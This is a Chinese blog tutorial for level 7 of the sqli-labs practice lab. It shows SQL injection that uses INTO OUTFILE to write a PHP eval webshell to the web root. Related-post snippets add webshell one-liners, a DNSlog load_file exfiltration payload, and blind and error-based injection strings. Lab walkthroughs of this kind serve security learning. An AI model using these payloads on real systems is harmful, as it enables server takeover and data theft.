SQL注入:sqli-labs靶场通关(第七关 一句话木马)

数据库文件上传漏洞与木马注入
最新推荐文章于 2025-04-02 14:57:55 发布
原创 最新推荐文章于 2025-04-02 14:57:55 发布 · 682 阅读 · 10 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#oracle #数据库

文件上传漏洞是什么

指程序员在编写文件上传的代码中,没有严格的过滤与控制,让恶意用户可以越权上传恶意脚本文件webshell(比如php,asp的一句话木马),实施未经允许的非法操作。

into outfile语句使用的三个条件

1.具有root权限

2.在数据库配置文件中的 配置项含有:secure_file_priv=(注意在数据库中此项默认为secure_file_priv=null)

3.知道数据库的绝对路径

1.判断注入类型

?id=1'
?id=1"

?id=1')--+
?id=1'))--+

闭合点为 ')) ,注入类型为字符型

2.猜字段

?id=1')) order by 3--+
?id=1')) order by 4--+

有三个字段

3.修改php配置文件

secure_file_priv=''

4.查询是否修改

show GLOBAL VARTABLES LIKE 'secure%'

5.找绝对路径

?id=-1 union select 1,@@datadir,@@basedir

绝对路径为:C:/phpstudy/PHPTutorial/www/sqlilabs/less-7/

6.用into outfile函数写入一句话木马

一句话木马

<?php @eval($_POST['密码']);?>
3c3f70687020406576616c28245f504f53545b2731275d293b3f3e

into outfile函数可以将文件导入到数据库的目录中,通过这个命令我们可以将一句话木马导入

?id=1')) union select 1,"<?php @eval($_POST['1']);?>",3 into outfile 
'C:\\phpStudy\\PHPTutorial\\WWW\\sqlilabs\\Less-7\\2.php'--+
?id=1')) union select 1,0x3c3f70687020406576616c28245f504f53545b2731275d293b3f3e,3 into outfile 
'C:\\phpStudy\\PHPTutorial\\WWW\\sqlilabs\\Less-7\\2.php'--+

7.上传

总结:

免责声明:工具本身并无好坏,希望大家以遵守《网络安全法》相关法律为前提来使用该工具,支持研究学习,切勿用于非法犯罪活动,对于恶意使用该工具造成的损失,和本人及开发者无关。

 

Lspecialnx_
关注
SQL注入篇——一句话木马
爱国小白帽
01-08 7031
、利用sql注入上传一句话木马 成功 验证 二、利用dns报错回显查看数据 三、利用dns报错回显数据 返回数据库名的注入语句 1’ and load_file(concat("\\",(database()),".2bmmih.dnslog.cn\1.txt"))- ...
sql注入一句话木马
告白的博客
07-09 3623
0x00 sql注入一句话木马 首先介绍一句话木马一句话木马种基于 B/S结构的简短脚本,通过这个脚本,执行POST来的任意参数语句,可以提交任意内容,黑客借此进行SQL注入或拿到SHELL写入大马或截取网站私密信息,达到注入非法信息等的目的。 常见脚本的一句话木马: php的一句话木马: <?php @eval($_POST['pass']);?> asp的一句话是: <%eval request (“pass”)%> aspx的一句话是: <%@ Page
一句话木马SQL注入
人若有志,就不会在半坡停止。
08-25 3050
sql注入
SQL注入上传一句话木马
buffedon的博客
05-31 1万+
利用sql注入上传一句话木马导读1. sql注入的危害2. 文件写入2.1 webshell和一句话木马webshell(大马)一句话木马木马文件的危害2.2 文件写入的前提条件2.3 写入函数2.4 怎么找网站根目录(绝对路径)2.5 只能与回显注入结合2.6 日志写文件2.7 文件读取前提条件读取函数2.8 针对文件写入的防护 导读 本文主要介绍了利用sql漏洞上传文件的些知识。在利用sql注入漏洞上传文件的时候我们需要知道 被上传的网页 在web服务器的路径 上传文件要获取哪些权限,也就是有哪些前
sql注入之into outfile语句写入一句话木马_sql的into outfile(1)
2301_77033340的博客
04-12 733
1、漏洞介绍into outfile 语句用于把表数据导出到个文本文件中,要想mysql用户对文件进行导入导出,首先要看指定的权限目录。mysql 新版本下secure_file_priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的。当secure_file_priv的值为null ,表示限制mysqld 不允许导入|导出;
Sqli-labs靶场通关(1-20
2301_77977773的博客
07-03 1207
为了不影响 80 端口的服务,我们可以设置 Apache 服务的端口为82这是因为主机本身已经存在 MySQL 服务,我们可以不使用 php-study 配置中的 MySQL,就用主机本身即可,但版本可能需要注意,我这里使用的 5.7.351.安装sqli-labs-master到phpstudy_pro中的WWW/目录下2.修改phpstudy_pro\WWW\sqli-labs-master\sql-connections的db-creds.inc文件。
Sqli-labs-master靶场之1-21通关秘籍
m0_66241651的博客
07-03 1024
靶场就是让我们掌握sql注入的基本方法,通关秘籍来了,轻轻松松搞定!
sqli-labs SQL注入靶场通关手册(1-21)
2301_76594872的博客
07-02 1225
前面需要准备打开phpstudy我这里是老版:phpstudy若3306端口被占用,win+r,cmd,命令行提示符里输入netstat -ano | findstr xxxx //xxxx为查询的端口号,找到pid,在任务管理器界面,选择对应的pid,详细信息结束进程同时需要再网页上打开跳转到如下界面:配置成功。
Sqli-labs靶场第8详解[Sqli-labs-less-8]
m0_73615178的博客
02-24 1457
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()sql注入——布尔型盲注(Boolean-based blind)
Sqli-labs-master靶场1-10通关教程
weixin_68416970的博客
07-24 2150
Sqli-labs-master靶场1-10的通关教程
sql注入攻击常用语句总结
03-29
sql注入总结 语句精简 类型丰富 种类齐全 值得学习 欢迎借鉴
SQL注入上传一句话木马(转)
hanzhen668的博客
06-10 1999
SQL注入上传一句话木马
sql注入之into outfile语句写入一句话木马
m0_63436163的博客
01-26 2405
into outfile 语句用于把表数据导出到个文本文件中,要想mysql用户对文件进行导入导出,首先要看指定的权限目录。当secure_file_priv的值为/tmp/ ,表示限制mysqld 的导入|导出只能发生在/tmp/目录下;5)select
流量案例分析:SQL注入一句话木马
NetInside_的博客
04-02 279
客户反馈公司某台服务器遭遇了入侵,于是联系我们帮忙分析流量,这是份从Netinside上进行网络回溯下载的流量包,后续分析发现是SQL注入一句话木马攻击的流量数据包。因为主要是HTTP的协议,所以为了更具体的找出攻击者做了哪些操作,首先筛选出POST键字(用户登录以及上传文件都需要用到POST表单)Frame3800提交post后,给它的回应状态码是200,证明该请求被通过了,于是检查Frame3801,找到了下载的文件内容。查询最后个POST表单Frame3800,发现有文件传输的内容。
尝试使用sql注入漏洞手工写入一句话木马
m0_46390077的博客
01-15 1641
使用sql注入漏洞手工写入webshell
SQL注入
qq_63785498的博客
06-10 2641
SQL注入语句:1、1';-- -查看有哪些库2、1';-- -查看有哪些表3、1';-- -查看表里面有哪些字段4、1';-- -查看表里面所有字段的内容。
sql注入学习
qq_42685664的博客
03-18 1774
sql注入学习
SQL注入常用查询语句
土拨鼠挖洞中的博客
06-23 2170
DB用户user() DB版本version()全局函数@@datadir、@@hostname @@VERSION、@@version_compile_os 当前库database()•        ASCII转字符char()•        连接字符串CONCAT_WS(CHAR(32,58,32),user(),database(),version()) table_schema 数据库...
SQL 注入总结(详细)
热门推荐
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
01-21 2万+
这篇文章是最近学习 SQL 注入后的笔记,里面整理了 SQL 常见的注入方式,供大家学习了解 SQL 注入的原理及方法,也方便后续自己回顾,如有什么错误的地方欢迎指出!
SQL注入sqli-labs靶场通关
最新发布
10-19
SQL注入是利用网站应用程序在构建数据库查询时的不当处理,攻击者插入恶意SQL代码片段,执行后可能泄露敏感信息、修改数据甚至控制服务器。对于sqli - labs靶场不同卡,有不同的通关方法。 在sqli - labs靶场Less - 1(GET_非盲注)部分,这属于GET型非盲注情况。对于这种情况,通常可以利用构造恶意SQL语句来探测数据库信息。例如,通过在URL参数处构造类似 `id=1' OR 1=1 --+` 这样的语句,若页面显示异常或显示了不同的数据,就说明存在SQL注入漏洞。之后可以进步构造语句获取数据库名、表名、字段名等信息,如 `id=-1' UNION SELECT 1, database(), 3 --+` 来获取当前数据库名 [^1]。 对于sqli - labs靶场Less - 5 ~ Less - 10(GET_盲注),由于是盲注情况,无法直接从页面获取完整的查询结果,需要通过构造条件判断语句,根据页面返回的不同状态来推断信息。例如可以使用 `id=1' AND IF((SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=DATABASE())>0, SLEEP(5), 1) --+` 这样的语句,若页面响应延迟了5秒,就说明当前数据库存在表。通过不断构造类似的条件判断语句,逐步获取数据库的信息 [^2]。 在卡还可以使用报错注入,如在某些情况下使用 `'and updatexml(1,concat(0x7e,(database()),0x7e),1) and '1'='1` 这样的语句,利用 `UPDATEXML` 函数的错误来输出数据库名等信息 [^3]。 ```sql -- 示例:获取数据库名 id=-1' UNION SELECT 1, database(), 3 --+ -- 示例:盲注判断是否存在表 id=1' AND IF((SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=DATABASE())>0, SLEEP(5), 1) --+ -- 示例:报错注入获取数据库名 'and updatexml(1,concat(0x7e,(database()),0x7e),1) and '1'='1 ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值